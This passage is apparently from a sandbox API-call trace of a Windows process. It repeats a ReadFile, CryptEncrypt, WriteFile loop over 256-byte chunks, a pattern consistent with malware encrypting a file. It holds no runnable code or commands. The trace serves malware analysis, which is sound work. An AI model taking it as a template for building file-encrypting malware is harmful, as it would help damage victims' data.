pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.393] GetLastError () returned 0x0 [0149.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.393] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.393] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.393] GetLastError () returned 0x0 [0149.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.393] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.393] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.393] GetLastError () returned 0x0 [0149.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.393] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.393] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.393] GetLastError () returned 0x0 [0149.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.393] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.393] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.393] GetLastError () returned 0x0 [0149.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.394] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.394] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.394] GetLastError () returned 0x0 [0149.394] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.394] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.394] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.394] GetLastError () returned 0x0 [0149.394] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.394] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.394] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.394] GetLastError () returned 0x0 [0149.394] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.394] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.394] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.394] GetLastError () returned 0x0 [0149.394] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.394] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.394] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.394] GetLastError () returned 0x0 [0149.394] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.394] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.394] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.394] GetLastError () returned 0x0 [0149.394] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.394] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.395] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.395] GetLastError () returned 0x0 [0149.395] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.395] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.395] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.395] GetLastError () returned 0x0 [0149.395] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.395] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.395] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.395] GetLastError () returned 0x0 [0149.395] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.395] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.395] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.395] GetLastError () returned 0x0 [0149.395] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.395] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.395] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.395] GetLastError () returned 0x0 [0149.395] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.395] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.395] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.395] GetLastError () returned 0x0 [0149.395] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.395] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.395] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.395] GetLastError () returned 0x0 [0149.395] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.396] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.396] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.396] GetLastError () returned 0x0 [0149.396] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.396] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.396] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.396] GetLastError () returned 0x0 [0149.396] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.396] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.396] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.396] GetLastError () returned 0x0 [0149.396] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.396] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.396] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.396] GetLastError () returned 0x0 [0149.396] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.396] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.396] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.396] GetLastError () returned 0x0 [0149.396] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.396] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.396] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.396] GetLastError () returned 0x0 [0149.396] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.397] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.397] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.397] GetLastError () returned 0x0 [0149.397] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.397] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.397] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.397] GetLastError () returned 0x0 [0149.397] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.397] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.397] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.397] GetLastError () returned 0x0 [0149.397] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.397] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.397] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.397] GetLastError () returned 0x0 [0149.397] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.397] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.397] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.397] GetLastError () returned 0x0 [0149.397] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.397] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.397] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.397] GetLastError () returned 0x0 [0149.397] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.398] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.398] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.398] GetLastError () returned 0x0 [0149.398] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.398] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.398] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.398] GetLastError () returned 0x0 [0149.398] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.398] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.398] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: 